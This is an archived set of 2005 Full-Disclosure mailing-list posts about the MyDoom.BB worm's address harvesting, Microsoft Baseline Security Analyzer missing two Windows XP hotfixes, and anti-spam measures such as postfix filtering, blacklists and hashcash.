> The new MyDoom.BB worm misuses Google / Yahoo / Lycos / etc.
> to search for e-mail addresses to be greeted with an
> infected e-mail message.
> 
> See:
> http://www.f-secure.com/v-descs/mydoom_bb.shtml

Sometimes I can't believe how ignorant and stupid people can be. There
are so many efficient AV products and still worms are running wild... 
:(


Re: [Full-Disclosure] Re: Yahoo Problems?

2005-02-17 Thread Geza Papp dr (Axelero)
Hello,

On 17 February 2005, 13:30:43, you wrote:

FT> The new MyDoom.BB worm misuses Google / Yahoo / Lycos / etc.
FT> to search for e-mail addresses to be greeted with an
FT> infected e-mail message.

FT> See:
FT> http://www.f-secure.com/v-descs/mydoom_bb.shtml

And from Sophos, as MyDoom.O

See:
http://www.sophos.com/virusinfo/analyses/w32mydoomo.html


-- 
Regards,
 Geza  mailto:[EMAIL PROTECTED]




[Full-Disclosure] Re: Yahoo Problems?

2005-02-17 Thread Feher Tamas
The new MyDoom.BB worm misuses Google / Yahoo / Lycos / etc.
to search for e-mail addresses to be greeted with an
infected e-mail message.

See:
http://www.f-secure.com/v-descs/mydoom_bb.shtml


[Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB88 6185 Correction

2005-02-16 Thread Joe Granto
Enterprise Update Scan Tool:
http://support.microsoft.com/?id=894193

This tool seems to be a solution between MBSA releases. This tool may be 
what you need to detect those fixes. From the URL above:

"Why does this tool exist?
Microsoft delivers this tool for certain bulletins in an MSRC release 
cycle that cannot be detected by the MBSA or the ODT. Each tool is 
specific to an MSRC release cycle."

and

"Why do the MBSA and the ODT not detect this update?
The MBSA and the ODT may not offer full detection for certain bulletins 
in an MSRC release cycle. Full detection may not be available because of 
a limitation of the detection engine or because the product that is 
affected is not supported by the MBSA or the ODT. We are working to 
resolve this issue in future versions of the MBSA through the Windows 
Update Server infrastructure. In the meantime, the Enterprise Update Scan 
Tool is designed to complement the MBSA and the ODT for security update 
detection. Whenever MBSA or ODT cannot offer detection, we plan to 
release an Enterprise Update Scan Tool."


Joe Granto, Senior Engineer
Intel Engineering, MCI (back in black)
Marimba Jedi
Office: (954)377-5632  VNET: 377-5632
Pager:  (888)500-6340 or [EMAIL PROTECTED]
FAX: (954)377-5793

LINUX is only free if your time is worthless.

"There is no estimated time of resolution."

Fear my three minute POP time-out.

There is no WorldCom, only Zuul.

WorldCom...  it was all a bad dream.

What's $11 billion between friends?

Complete : having all necessary parts, elements, or steps

Sprint, BP, WorldCom, Qwest, Verizon..  someone make the pain stop.



[Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB886185

2005-02-16 Thread Harshad
KB887742 and KB886185 are not security updates, they are just patches... that's the reason they are not detected by MBSA.
Regards,
Harshad.
http://www.securityalertz.com



Re: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB886185

2005-02-16 Thread Thor (Hammer of God)
Actually, the KB article is incorrect.  Only other users from the same 
dial-up ISP given IP's considered in the same "local" subnet would be able 
to have NBT traffic considered local and thus pass through the firewall.  It 
is not "anyone on the Internet" as the KB states.  They would still need a 
username and password to access the resource.  Additionally, one should note 
that on non-domain member systems, administrators would have to explicitly 
allow FPS exceptions after the fact for this to be an issue in the first 
place, and even so, only after going in and manually binding FPS to the 
dial-up interface which is disabled by default.  You really have to go 
around your gluteus maximus to present this as an issue.  So, IMO, it is not 
a major security hole.

The Invalid_Process_Attach_Attempt bug does not have security implications, 
though in particular configurations a DoS condition does exist.  DoS != 
security vulnerability in this case.

But, notwithstanding the above caveats, I agree with you that 886185 is 
still a potential security issue, and for that reason, should be checked by 
MBSA.

T
- Original Message - 
From: "Randal, Phil" <[EMAIL PROTECTED]>
To: "BuqtraqNT (E-mail)" <[EMAIL PROTECTED]>; 
"BugtraqSecurity (E-mail)" ; "Full-Disclosure 
(E-mail)" 
Sent: Tuesday, February 15, 2005 2:09 AM
Subject: RE: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer not 
seeing KB887742 and KB886185


KB887742: "A computer that is running Microsoft Windows XP Service Pack
2 (SP2), Microsoft Windows XP Tablet PC Edition 2005, or Microsoft
Windows Server 2003 unexpectedly stops. Additionally, the following Stop
error message appears on a blue screen: Stop 0x05
(INVALID_PROCESS_ATTACH_ATTEMPT)".
That's a denial of service.  There are security implications there.
KB886185: "After you set up Windows Firewall in Microsoft Windows XP
Service Pack 2 (SP2), you may discover that anyone on the Internet can
access resources on your computer when you use a dial-up connection to
connect to the Internet."
That looks like a major security hole to me.
Cheers,
Phil

Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf
Of Threlkeld, Richard
Sent: 15 February 2005 00:19
To: James Lay; BuqtraqNT (E-mail); BugtraqSecurity (E-mail);
Full-Disclosure (E-mail)
Subject: [Full-Disclosure] RE: Microsoft Baseline Security
Analyzer not seeing KB887742 and KB886185
These are not security updates.  KB887742 is for a stop error
(http://support.microsoft.com/kb/887742) and  KB886185 is an
update for network scope on the Windows Firewall
(http://support.microsoft.com/default.aspx?scid=kb;en-us;886185) .
The MBSA scans for Security Updates only, not every hotfix
ever released.  Note that a "Critical" patch is not
necessarily a "Security"
patch.  You may be thinking of the "Maximum severity" levels
of the MS*-xxx security bulletins which are not the same thing.
Best,
Richard Threlkeld
Microsoft MVP - SMS
http://myitforum.techtarget.com/blog/rthrelkeld/

-Original Message-
From: James Lay [mailto:[EMAIL PROTECTED]
Sent: Monday, February 14, 2005 10:24 AM
To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure
(E-mail)
Subject: Microsoft Baseline Security Analyzer not seeing KB887742 and
KB886185
Subject line says it all...just did a fresh install of WinXP
SP2...was using MBSAFU to make sure it would patch...which
it did.  However Windows Update shows still needing KB887742
and KB886185.  MBSA shows no critical patches need updated.
Systeminfo shows that both KB887742 and
KB886185 are NOT installed.  I'm using latest MBSA.  Anyone
else see this?  Kinda sucks :(
James Lay
Network Manager/Security Officer
AmeriBen Solutions/IEC Group
Deo Gloria!!!


RE: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB886185

2005-02-16 Thread Threlkeld, Richard
I don't dispute that there are security concerns there however the tool
in question, the MBSA, was designed for a specific purpose which the
original poster doesn't seem to understand.  The breadth of Windows is
quite large and as such the amount of bugs possible are large being
security related or not.  If you were to classify every DoS as a
security implication that needed to be scanned by the MBSA it would take
hours to scan a single system and compare its patch level against every
hotfix released for an OS.

On top of that though the MBSA does do a good job at scanning for common
security misconfigurations on a Windows system such as weak
Administrator passwords, auditing, and some other general Windows
vulnerabilities.  MS also has some great scripts for the utility located
off of the MBSA homepage which concatenate the data and roll it up into
nice reports.  But to say that any BSOD is a DoS and expecting a tool
such as the MBSA to scan against a database containing every hotfix for
a BSOD is a bit unreasonable IMO.  The MSSECURE.XML is large enough as
it is, I couldn't imagine the size of an update catalog for every hotfix
for BSOD's that MS releases (although I suppose you could do it and have
/HF just scan for MSxx-xxx updates and another switch for scanning
against a different XML file containing every hotfix with the caveat
that the scan would take longer).  If I were to really criticize
anything it would be the performance of the MBSA which is sub par at
best.

This really is just a case of understanding what a specific tool is
designed to do and what it is not designed to do.  And being that it's a
free tool which when it has had detection issues over the past 6 month's
MS has created additional scanning tools to fill in the gaps and not
leave their customers high and dry, I'd find it hard to criticize them
that much.

Best,

Richard Threlkeld
Microsoft MVP - SMS
http://myitforum.techtarget.com/blog/rthrelkeld/



-Original Message-
From: Randal, Phil [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, February 15, 2005 2:09 AM
To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure
(E-mail)
Subject: RE: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer
not seeing KB887742 and KB886185

KB887742: "A computer that is running Microsoft Windows XP Service Pack
2 (SP2), Microsoft Windows XP Tablet PC Edition 2005, or Microsoft
Windows Server 2003 unexpectedly stops. Additionally, the following Stop
error message appears on a blue screen: Stop 0x05
(INVALID_PROCESS_ATTACH_ATTEMPT)".

That's a denial of service.  There are security implications there.

KB886185: "After you set up Windows Firewall in Microsoft Windows XP
Service Pack 2 (SP2), you may discover that anyone on the Internet can
access resources on your computer when you use a dial-up connection to
connect to the Internet."

That looks like a major security hole to me.

Cheers,

Phil


Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK  

> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of 
> Threlkeld, Richard
> Sent: 15 February 2005 00:19
> To: James Lay; BuqtraqNT (E-mail); BugtraqSecurity (E-mail); 
> Full-Disclosure (E-mail)
> Subject: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer 
> not seeing KB887742 and KB886185
> 
> These are not security updates.  KB887742 is for a stop error
> (http://support.microsoft.com/kb/887742) and  KB886185 is an update 
> for network scope on the Windows Firewall
> (http://support.microsoft.com/default.aspx?scid=kb;en-us;886185) .
> 
> The MBSA scans for Security Updates only, not every hotfix ever 
> released.  Note that a "Critical" patch is not necessarily a 
> "Security"
> patch.  You may be thinking of the "Maximum severity" levels of the 
> MS*-xxx security bulletins which are not the same thing.
> 
> Best,
> 
> Richard Threlkeld
> Microsoft MVP - SMS
> http://myitforum.techtarget.com/blog/rthrelkeld/
> 
> 
> 
> -Original Message-
> From: James Lay [mailto:[EMAIL PROTECTED]
> Sent: Monday, February 14, 2005 10:24 AM
> To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure
> (E-mail)
> Subject: Microsoft Baseline Security Analyzer not seeing KB887742 and
> KB886185
> 
> Subject line says it all...just did a fresh install of WinXP 
> SP2...was using MBSAFU to make sure it would patch...which it did.  
> However Windows Update shows still needing KB887742 and KB886185.  
> MBSA shows no critical patches need updated.
> Systeminfo shows that both KB887742 and
> KB886185 are NOT installed.  I'm using latest MBSA.  Anyone else see 
> this?  Kinda sucks :(
> 
> James Lay
> Network Manager/Security Officer
> AmeriBen Solutions/IEC Group
> Deo Gloria!!!

Re: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer no t seeing KB887742 and KB886185

2005-02-15 Thread Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP]
Ping Microsoft.. they were not classified as Security patches [not 
assigned 05-### numbers ergo they aren't on MBSA]

As Richard stated, they aren't security bulletins.
Heck I'd LOVE to get 835734 for the SBS 2003 platform merely on Windows 
Update and honestly I can't wait for WUS or whatever.  Right now there 
are tons of unpatched SBS boxes that are spam machines.  
http://www.sbslinks.com/popconnector.htm

I know at least 886185 is on Windows update so count your blessings.
Randal, Phil wrote:
KB887742: "A computer that is running Microsoft Windows XP Service Pack
2 (SP2), Microsoft Windows XP Tablet PC Edition 2005, or Microsoft
Windows Server 2003 unexpectedly stops. Additionally, the following Stop
error message appears on a blue screen: Stop 0x05
(INVALID_PROCESS_ATTACH_ATTEMPT)".
That's a denial of service.  There are security implications there.
KB886185: "After you set up Windows Firewall in Microsoft Windows XP
Service Pack 2 (SP2), you may discover that anyone on the Internet can
access resources on your computer when you use a dial-up connection to
connect to the Internet."
That looks like a major security hole to me.
Cheers,
Phil

Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK  

 

-Original Message-
From: [EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED] On Behalf 
Of Threlkeld, Richard
Sent: 15 February 2005 00:19
To: James Lay; BuqtraqNT (E-mail); BugtraqSecurity (E-mail); 
Full-Disclosure (E-mail)
Subject: [Full-Disclosure] RE: Microsoft Baseline Security 
Analyzer not seeing KB887742 and KB886185

These are not security updates.  KB887742 is for a stop error
(http://support.microsoft.com/kb/887742) and  KB886185 is an 
update for network scope on the Windows Firewall
(http://support.microsoft.com/default.aspx?scid=kb;en-us;886185) .

The MBSA scans for Security Updates only, not every hotfix 
ever released.  Note that a "Critical" patch is not 
necessarily a "Security"
patch.  You may be thinking of the "Maximum severity" levels 
of the MS*-xxx security bulletins which are not the same thing.

Best,
Richard Threlkeld
Microsoft MVP - SMS
http://myitforum.techtarget.com/blog/rthrelkeld/

-Original Message-
From: James Lay [mailto:[EMAIL PROTECTED]
Sent: Monday, February 14, 2005 10:24 AM
To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure
(E-mail)
Subject: Microsoft Baseline Security Analyzer not seeing KB887742 and
KB886185
Subject line says it all...just did a fresh install of WinXP 
SP2...was using MBSAFU to make sure it would patch...which 
it did.  However Windows Update shows still needing KB887742 
and KB886185.  MBSA shows no critical patches need updated.  
Systeminfo shows that both KB887742 and
KB886185 are NOT installed.  I'm using latest MBSA.  Anyone 
else see this?  Kinda sucks :(

James Lay
Network Manager/Security Officer
AmeriBen Solutions/IEC Group
Deo Gloria!!!
   

 

--
An open letter to the Security Community:: 
http://msmvps.com/bradley/archive/2004/12/12/23540.aspx



RE: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer no t seeing KB887742 and KB886185

2005-02-15 Thread Randal, Phil
KB887742: "A computer that is running Microsoft Windows XP Service Pack
2 (SP2), Microsoft Windows XP Tablet PC Edition 2005, or Microsoft
Windows Server 2003 unexpectedly stops. Additionally, the following Stop
error message appears on a blue screen: Stop 0x05
(INVALID_PROCESS_ATTACH_ATTEMPT)".

That's a denial of service.  There are security implications there.

KB886185: "After you set up Windows Firewall in Microsoft Windows XP
Service Pack 2 (SP2), you may discover that anyone on the Internet can
access resources on your computer when you use a dial-up connection to
connect to the Internet."

That looks like a major security hole to me.

Cheers,

Phil


Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK  

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of Threlkeld, Richard
> Sent: 15 February 2005 00:19
> To: James Lay; BuqtraqNT (E-mail); BugtraqSecurity (E-mail); 
> Full-Disclosure (E-mail)
> Subject: [Full-Disclosure] RE: Microsoft Baseline Security 
> Analyzer not seeing KB887742 and KB886185
> 
> These are not security updates.  KB887742 is for a stop error
> (http://support.microsoft.com/kb/887742) and  KB886185 is an 
> update for network scope on the Windows Firewall
> (http://support.microsoft.com/default.aspx?scid=kb;en-us;886185) .
> 
> The MBSA scans for Security Updates only, not every hotfix 
> ever released.  Note that a "Critical" patch is not 
> necessarily a "Security"
> patch.  You may be thinking of the "Maximum severity" levels 
> of the MS*-xxx security bulletins which are not the same thing.
> 
> Best,
> 
> Richard Threlkeld
> Microsoft MVP - SMS
> http://myitforum.techtarget.com/blog/rthrelkeld/
> 
> 
> 
> -Original Message-
> From: James Lay [mailto:[EMAIL PROTECTED]
> Sent: Monday, February 14, 2005 10:24 AM
> To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure
> (E-mail)
> Subject: Microsoft Baseline Security Analyzer not seeing KB887742 and
> KB886185
> 
> Subject line says it all...just did a fresh install of WinXP 
> SP2...was using MBSAFU to make sure it would patch...which 
> it did.  However Windows Update shows still needing KB887742 
> and KB886185.  MBSA shows no critical patches need updated.  
> Systeminfo shows that both KB887742 and
> KB886185 are NOT installed.  I'm using latest MBSA.  Anyone 
> else see this?  Kinda sucks :(
> 
> James Lay
> Network Manager/Security Officer
> AmeriBen Solutions/IEC Group
> Deo Gloria!!!
> 
> 
> 


[Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB886185

2005-02-15 Thread STANESCU Ionut
Hi James, 

I have the same problem, and others too. The command-line mbsacli has various 
functionality problems. To resolve this problem I use GFI Lan Guard Scanner 
6.0. Until now it has resolved the patch problems (detection and distribution of these). 

Regards,


Ionut Stanescu
BRD - Groupe Société Générale 
Departamentul Sisteme Informatice / Directia Sisteme si Retele / Sisteme de 
Operare
(DSI/DSR/SSO)


-Original Message-
From: James Lay [mailto:[EMAIL PROTECTED] 
Sent: Monday, February 14, 2005 8:24 PM
To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure (E-mail)
Subject: Microsoft Baseline Security Analyzer not seeing KB887742 and KB886185

Subject line says it all...just did a fresh install of WinXP SP2...was using 
MBSAFU to make sure it would patch...which it did.  However Windows Update 
shows still needing KB887742 and KB886185.  MBSA shows no critical patches need 
updated.  Systeminfo shows that both KB887742 and KB886185 are NOT installed.  
I'm using latest MBSA.  Anyone else see this?  Kinda sucks :(

James Lay
Network Manager/Security Officer
AmeriBen Solutions/IEC Group
Deo Gloria!!!







RE: [Full-Disclosure] Re: [Mailman-Developers] mailman emailharvester

2005-02-15 Thread Aditya Deshmukh
> But cutting off 82% even before the DATA command is not too shabby. OTOH it
> is a sign on how bad mail has become if more than 80% are plain junk even
> without looking at the content.

And it is going to get worse from here!





[Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB886185

2005-02-14 Thread Threlkeld, Richard
These are not security updates.  KB887742 is for a stop error
(http://support.microsoft.com/kb/887742) and  KB886185 is an update for
network scope on the Windows Firewall
(http://support.microsoft.com/default.aspx?scid=kb;en-us;886185) .

The MBSA scans for Security Updates only, not every hotfix ever
released.  Note that a "Critical" patch is not necessarily a "Security"
patch.  You may be thinking of the "Maximum severity" levels of the
MS*-xxx security bulletins which are not the same thing.

Best,

Richard Threlkeld
Microsoft MVP - SMS
http://myitforum.techtarget.com/blog/rthrelkeld/



-Original Message-
From: James Lay [mailto:[EMAIL PROTECTED] 
Sent: Monday, February 14, 2005 10:24 AM
To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure
(E-mail)
Subject: Microsoft Baseline Security Analyzer not seeing KB887742 and
KB886185

Subject line says it all...just did a fresh install of WinXP SP2...was
using MBSAFU to make sure it would patch...which it did.  However
Windows Update shows still needing KB887742 and KB886185.  MBSA shows no
critical patches need updated.  Systeminfo shows that both KB887742 and
KB886185 are NOT installed.  I'm using latest MBSA.  Anyone else see
this?  Kinda sucks :(

James Lay
Network Manager/Security Officer
AmeriBen Solutions/IEC Group
Deo Gloria!!!




[Full-Disclosure] Re: GREENAPPLE Release - (OFFTOPIC - sorry).

2005-02-14 Thread Ken Dyke
On Sun, Feb 13, 2005 at 06:44:53PM -0500, pretty vacant ([EMAIL PROTECTED]) 
wrote:
> Perhaps you'd like to automate that email with a discriptive, static
> subject people can filter. Or better yet, maybe someone should start a
> Kurt Seifried moderated subset of this list. Yeah, that's an idea.

Or instead of cluttering up the subject line people who do not know how
to filter can do themselves a favor and learn.
-- 
Chief Gadgeteer
Elegant Innovations


Re: [Full-Disclosure] Re: [Mailman-Developers] mailman emailharvester

2005-02-13 Thread Volker Tanger
Greetings!

On Sun, 13 Feb 2005 15:31:53 +0530
"Aditya Deshmukh" <[EMAIL PROTECTED]>
wrote:
>
> 1. postfix will reject 90% of the spam during the initial handshake
> stage - by using a variety of dns / mx resolution tricks 
> 2. clamav and spam assassin integrate into postfix so that you don't
> have to accept the spam the server can even issue a 550 in the middle
> of the data stage
> 3. using some known blacklists like spamhaus and rbl will cut down
> spam to 99.9 % 

Well, my current stats say:

User unknown:   25 %
RBL-blocked:32 %
keyword blocked: 1 %
other blocked:  24 %
locally delivered:  17 %

So a "cut down to 99.9%" is a bit pessimistic (filtering only 0.1% out)
- if you meant "cut by 99.9%" too optimistic. But cutting off 82% even
before the DATA command is not too shabby. OTOH it is a sign on how bad
mail has become if more than 80% are plain junk even without looking at
the content.

Bye
Volker

-- 

Volker Tanger    http://www.wyae.de/volker.tanger/
--
[EMAIL PROTECTED]    PGP Fingerprint
378A 7DA7 4F20 C2F3 5BCC  8340 7424 6122 BB83 B8CB


RE: [Full-Disclosure] Re: [Mailman-Developers] mailman emailharvester

2005-02-13 Thread Aditya Deshmukh
> Hashcash isn't even a tiny speed bump if you're a spammer and have 50,000
> zombies - each one only takes a 5 second hiccup and continues spamming

Hashcash and other systems that rely on some sort of checksumming are going
to cause problems, and hence their adoption is always going to be under a
cloud!

For me the best possible thing to do is to put up an OpenBSD server with a
postfix / ClamAV / SpamAssassin / amavis combo

1. postfix will reject 90% of the spam during the initial handshake stage -
by using a variety of DNS / MX resolution tricks 
2. ClamAV and SpamAssassin integrate into postfix so that you don't have to
accept the spam; the server can even issue a 550 in the middle of the DATA
stage
3. using some known blacklists like Spamhaus and RBLs will cut down spam to
99.9 % 


With a combo of all this : no spam - we do not have to worry about our
address being leaked.




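The hashcash scheme this sub-thread argues about, as an added example (not code from any of the posters): a minimal minter and verifier in Python following the hashcash v1 stamp layout "1:bits:date:resource:ext:rand:counter", where the stamp is valid when its SHA-1 digest starts with at least `bits` zero bits. The resource name, bit counts and date used below are my choices. The point it makes concrete is the asymmetry both sides of the argument rely on: minting costs about 2**bits hashes, checking costs one, and the receiver still has to keep a spent-stamp set so one paid stamp cannot be replayed.

```python
import hashlib
import secrets
import time
from typing import Optional, Set

# Hashcash v1 stamp: "1:bits:date:resource:ext:rand:counter" (ext left empty here).
# The resource is normally the recipient address; it must not contain ':'.


def leading_zero_bits(digest: bytes) -> int:
    """Number of leading zero bits in a digest."""
    count = 0
    for byte in digest:
        if byte == 0:
            count += 8
        else:
            count += 8 - byte.bit_length()
            break
    return count


def mint(resource: str, bits: int = 16, date: Optional[str] = None,
         rand: Optional[str] = None) -> str:
    """Sender side: brute-force the counter until SHA-1(stamp) has `bits` leading zeros.
    Expected cost is 2**bits hashes; `date` and `rand` are fixed only for testing."""
    date = date or time.strftime("%y%m%d", time.gmtime())
    rand = rand or secrets.token_urlsafe(12)  # urlsafe alphabet never contains ':'
    counter = 0
    while True:
        stamp = f"1:{bits}:{date}:{resource}::{rand}:{counter}"
        if leading_zero_bits(hashlib.sha1(stamp.encode()).digest()) >= bits:
            return stamp
        counter += 1


def verify(stamp: str, resource: str, min_bits: int, seen: Set[str]) -> bool:
    """Receiver side: one SHA-1 plus a double-spend check.
    `seen` is the receiver's store of already-accepted stamps."""
    parts = stamp.split(":")
    if len(parts) != 7 or parts[0] != "1":
        return False
    try:
        bits = int(parts[1])
    except ValueError:
        return False
    if bits < min_bits or parts[3] != resource:
        return False
    if leading_zero_bits(hashlib.sha1(stamp.encode()).digest()) < bits:
        return False
    if stamp in seen:  # a stamp is money spent once; replaying it is free for a spammer
        return False
    seen.add(stamp)
    return True


def expected_hashes(bits: int) -> int:
    """Average SHA-1 evaluations a sender needs per stamp at this difficulty."""
    return 2 ** bits


if __name__ == "__main__":
    seen: Set[str] = set()
    recipient = "list@example.com"  # constructed resource
    for bits in (8, 12, 16, 18):
        t0 = time.perf_counter()
        stamp = mint(recipient, bits)
        elapsed = time.perf_counter() - t0
        ok = verify(stamp, recipient, bits, seen)
        print(f"{bits:2d} bits  ~{expected_hashes(bits):>7d} hashes  "
              f"{elapsed:7.3f}s  valid={ok}  {stamp}")
```

Running the block shows the minting time roughly quadrupling per two extra bits while verification stays constant. Read against the quoted objection: a sender controlling many machines pays that minting cost in parallel, so the per-message delay that hurts a legitimate list server barely registers for a zombie network, which is the cost model the rest of this thread is disputing.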


[Full-Disclosure] Re: mailman email harvester

2005-02-12 Thread Valdis Kletnieks
On Sat, 12 Feb 2005 13:11:41 +0100, Bernhard Kuemel said:

> If a user chooses to use hashcash he must understand it. If he
> doesn't and subscribes to a mailing list all the list mail will go
> to his spam folder. He will learn from that and whitelist list mail.

Given the number of people who can't even learn "don't open the spam" and
"Don't click on the spyware links", I doubt enough users will both choose
and do it right to make a difference.

> | And remember that the whole *idea*
> | of hashcash is that you make it impractical for somebody to send
> 3,000 pieces
> | of mail.  I'm sure netsys.com wouldn't want to keep
> full-disclosure if they had
> | to do hashcash for even 10% of their users.
> 
> They would not hashcash every mail, but sign each incoming mail so
> spammers can't spam subscribers whose addresses then can be published
> again.

You missed the point - if a user forgets to whitelist netsys.com, then
*NETSYS.COM* has to do a hashcash to deliver the *outbound* mail to the
bozo's ISP.


> Subscribing to mailing lists has always been a process of following
> instructions. If you subscribe via a web page, this web page will
> tell you which addresses to whitelist. If you subscribe via email
> firstly there will also be some source of instructions how to
> subscribe, and secondly you can whitelist replies that reference
> (private) emails you sent recently.

You'd be surprised how many people get it wrong *now*, when the instructions
only say "send mail to *this* address with *this* in it".  I've seen people
manage to get it wrong even when they have a link that says

mailto:[EMAIL PROTECTED]&body=subscribe listname

If you just say "and remember to whitelist [EMAIL PROTECTED]" they won't know
how.  And if you try to give directions, you'll have to have AOL instructions, and
Hotmail instructions, and Yahoo instructions, and GMail instructions, and at
least some of the Hotmail users will try to follow the Yahoo instructions just
because they're total yahoos as well as being hotmail subscribers..


> | There's also all the stuff that things like amazon, ebay, your bank,
> | your insurance company, your utility companies, etc... all send out,
> | that users will forget to whitelist.
> 
> They can send hashcashed requests for being whitelisted which will
> pop up a window similar to message receipt requests.

And the spammers can send hashcashed requests too - remember they have thousands
of zombies, so it doesn't bother them...

> I don't understand the situation. Human edited mail is usually
> created on a workstation that is capable of making hashcash while
> the mail is edited.

You missed a point here.  If I'm composing on a workstation, you *DONT*
want me to do a hashcash *THEN* - because if I'm a spammer, I can do the
hashcash ONCE, and send it to 75 different mailservers, and they'll never
know.

What ends up happening is the user composes it, hits "send", it goes to their
ISP's mail hub - and when the 75 copies go out, the mail hub has to do a
different hashcash for each of the 75 destinations that ask for a hashcash.

That's why hashcash is painful to mail hubs.

> Configure your system to require more. 1 minute. Or 10. Or 20. The
> amount of hashcash can be put in an email address comment or if
> insufficient cash is sent, the receiving system can automatically
> request more.

Remember that you have to pick a number that a legitimate ISP can calculate
a fair number of them a day - if you're cranking a million e-mails a day,
which even a fairly small site like ours manages to do, and only 1% of the
mail needs to be hash-cashed for one CPU minute, suddenly you need 6 CPUs
doing nothing but grinding hashcash.

On the other hand, if you're a spammer with 10K zombies, requiring a minute
of hashcash still means you can send 1.4M spam per day, using other people's
CPU.



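To make the cost argument in this thread concrete, here is an added Python illustration of hashcash version 1 stamps (the format hashcash.org describes: `1:bits:YYMMDD:resource:ext:rand:counter`, valid when the SHA-1 of the stamp has at least `bits` leading zero bits). It is not code from hashcash.org, Mailman or any poster. The sender loops over counters until the hash shows the work; the receiver does one hash, checks the date window and the resource binding, and keeps a replay cache. The recipient address, the pinned date and nonce, the 12-bit difficulty (chosen so the demo runs instantly) and the in-memory replay set are all assumptions made for the demonstration.

```python
"""Hashcash v1 stamps: minting on the sender side, checking on the receiver side.

Added illustration for the thread above; not code from hashcash.org or Mailman.
Stamp layout (hashcash version 1):

    1:bits:YYMMDD:resource:ext:rand:counter

A stamp is valid when SHA-1 of the whole string has at least `bits` leading
zero bits. Minting means trying counters until that happens; checking is one
hash plus a replay lookup, which is the cost asymmetry the scheme relies on.
"""
import base64
import hashlib
import os
from datetime import date, datetime, timezone
from typing import Dict, Optional, Set, Tuple


def leading_zero_bits(digest: bytes) -> int:
    """Count leading zero bits of a digest."""
    n = 0
    for b in digest:
        if b == 0:
            n += 8
        else:
            n += 8 - b.bit_length()
            break
    return n


def stamp_bits(stamp: str) -> int:
    """Work actually present in a stamp (leading zero bits of its SHA-1)."""
    return leading_zero_bits(hashlib.sha1(stamp.encode()).digest())


def mint(resource: str, bits: int = 20, day: Optional[str] = None,
         rand: Optional[str] = None) -> str:
    """Sender side: search counters until the stamp shows `bits` zero bits.

    `day` is YYMMDD and `rand` a per-stamp nonce; both default to fresh values
    and are pinned in demo() so the run is reproducible. Expected cost is about
    2**bits hashes, so 20 bits is a noticeable pause and 12 bits is instant.
    """
    day = day or datetime.now(timezone.utc).strftime("%y%m%d")
    rand = rand or base64.b64encode(os.urandom(12)).decode("ascii")
    counter = 0
    while True:
        stamp = f"1:{bits}:{day}:{resource}::{rand}:{counter}"
        if stamp_bits(stamp) >= bits:
            return stamp
        counter += 1


class StampChecker:
    """Receiver side: required work, date window, resource binding, replay cache."""

    def __init__(self, required_bits: int = 20, max_age_days: int = 28):
        self.required_bits = required_bits
        self.max_age_days = max_age_days
        self.seen: Set[str] = set()  # assumption: a real MTA keeps this in a database

    def check(self, stamp: str, expected_resource: str, today: date) -> Tuple[bool, str]:
        parts = stamp.split(":")
        if len(parts) != 7 or parts[0] != "1":
            return False, "malformed stamp"
        _, bits_s, day_s, resource, _ext, _rand, _counter = parts
        if not bits_s.isdigit() or int(bits_s) < self.required_bits:
            return False, "claimed work below policy"
        # The resource field binds the stamp to one recipient: a stamp minted
        # for another address is worthless here even though its hash is valid.
        if resource != expected_resource:
            return False, "stamp minted for a different resource"
        try:
            stamp_day = datetime.strptime(day_s, "%y%m%d").date()
        except ValueError:
            return False, "bad date field"
        age = (today - stamp_day).days
        if age < 0 or age > self.max_age_days:
            return False, "stamp expired or postdated"
        if stamp_bits(stamp) < int(bits_s):
            return False, "hash does not show the claimed work"
        if stamp in self.seen:
            return False, "stamp already spent (replay)"
        self.seen.add(stamp)
        return True, "ok"


def demo() -> Dict[str, object]:
    """Mint one 12-bit stamp with pinned inputs and run it through the checks."""
    list_addr = "list-owner@example.com"  # constructed address, not a real list
    stamp = mint(list_addr, bits=12, day="050212", rand="c29tZXJhbmQ=")
    today = date(2005, 2, 12)
    checker = StampChecker(required_bits=12)
    strict = StampChecker(required_bits=16)
    return {
        "stamp": stamp,
        "bits": stamp_bits(stamp),
        "fresh": checker.check(stamp, list_addr, today),
        "replay": checker.check(stamp, list_addr, today),
        "other_resource": checker.check(stamp, "someone-else@example.com", today),
        "stale": checker.check(stamp, list_addr, date(2005, 4, 1)),
        "policy_16": strict.check(stamp, list_addr, today),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:15} {value}")
```

Raising `bits` in `demo()` from 12 to 20 shows the sender-side cost the posters argue about; the checker's work does not change. The resource check is the reason a mail hub cannot reuse one stamp across many destinations: every recipient that demands a stamp gets one bound to its own address.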


Re: [Full-Disclosure] Re: [Mailman-Developers] mailman email harvester

2005-02-11 Thread Valdis . Kletnieks
